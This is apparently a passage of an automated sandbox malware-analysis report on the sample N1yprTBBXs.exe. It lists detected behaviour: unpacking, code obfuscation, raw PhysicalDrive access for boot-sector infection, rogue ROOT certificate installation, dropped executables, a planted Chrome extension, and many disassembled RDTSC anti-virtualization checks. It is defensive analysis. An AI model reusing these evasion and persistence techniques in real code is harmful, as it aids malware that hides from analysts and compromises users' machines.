Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000017.00000000.290207974.0000000000DBC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 6272167835D47591.exe, 00000003.00000002.309104077.000000000359C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000005.00000002.276718783.00000000036EC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.1.dr
Source: N1yprTBBXs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: N1yprTBBXs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: N1yprTBBXs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: N1yprTBBXs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: N1yprTBBXs.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Unpacked PE file: 1.2.N1yprTBBXs.exe.2840000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Unpacked PE file: 3.2.6272167835D47591.exe.2810000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Unpacked PE file: 5.2.6272167835D47591.exe.2850000.5.unpack
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00414280 PathCombineW,LoadLibraryW,GetProcAddress,FreeLibrary, 1_2_00414280
PE file contains an invalid checksum
Source: MSIE145.tmp.2.dr Static PE information: real checksum: 0x0 should be: 0x2d22
Source: N1yprTBBXs.exe Static PE information: real checksum: 0x195ad2 should be: 0x4cf583
Source: 6272167835D47591.exe.1.dr Static PE information: real checksum: 0x195ad2 should be: 0x4cf583
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004F001D push esp; ret 1_2_004F01CF
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004620E0 push ecx; mov dword ptr [esp], 00000000h 1_2_004620E1
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004F01A7 push esp; ret 1_2_004F01CF
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_00406260 push ecx; mov dword ptr [esp], 00000000h 1_2_00406261
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004F6375 push ecx; ret 1_2_004F6388
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Code function: 1_2_004F47DA push ecx; ret 1_2_004F47ED
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 2_2_051EF370 push B4051EF4h; ret 2_2_051EF375
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_10010579 push ecx; ret 3_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040E2F1 push ecx; ret 10_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040E340 push eax; ret 10_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040E340 push eax; ret 10_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 23_2_00DB3FB5 push ecx; ret 23_2_00DB3FC8

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 3_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 3_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 3_2_1001D7E0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\N1yprTBBXs.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Jump to dropped file
Source: C:\Users\user\Desktop\N1yprTBBXs.exe File created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Roaming\1611969895131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIE145.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll Jump to dropped file
Installs a Chrome extension
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\icon.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\icon48.png Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\popup.html Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\background.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\book.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\jquery-1.8.3.min.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\popup.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hgbhlbickleeahcekelaihlhilcoplad\1.0.0.0_0\manifest.json Jump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sector
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 3_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 3_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d 3_2_1001D7E0

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Code function: 10_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_0040C41D
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\msiexec.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\1611969895131.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe Code function: 3_2_100204C0 3_2_100204C0
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB01 second address: 00000000004EFB07 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB07 second address: 00000000004EFB20 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ah 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB20 second address: 00000000004EFB26 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB26 second address: 00000000004EFB4B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A3h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 004EFE72h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB4B second address: 00000000004EFB51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB51 second address: 00000000004EFB74 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A5h 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB74 second address: 00000000004EFB7A instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFB9B second address: 00000000004EFBA1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFBC1 second address: 00000000004EFBC7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A1h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFBEA second address: 00000000004EFBF0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A2h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFEDD second address: 00000000004EFEE3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A2h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFF03 second address: 00000000004EFF09 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A4h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFF31 second address: 00000000004EFF37 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFF56 second address: 00000000004EFF5C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F8184DB2249h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F002E second address: 00000000004F0034 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A5h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F8184DB23A9h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0062 second address: 00000000004F0068 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0085 second address: 00000000004F008B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F00A5 second address: 00000000004F00AB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F00C7 second address: 00000000004F00CD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A2h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F00EF second address: 00000000004F00F5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A0h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0116 second address: 00000000004F011C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A6h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0142 second address: 00000000004F0148 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0167 second address: 00000000004F016D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0188 second address: 00000000004F018E instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A6h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F01B3 second address: 00000000004F01B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A1h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F01DA second address: 00000000004F01E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB21A3h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0203 second address: 00000000004F0209 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F0226 second address: 00000000004F022C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F8184DB1EE8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFF9F second address: 00000000004EFFA5 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFFC3 second address: 00000000004EFFC9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F8184DB219Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\N1yprTBBXs.exe RDTSC instruction interceptor: First address: 00000000004EFFE5 second address: 00000000004EFFEB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
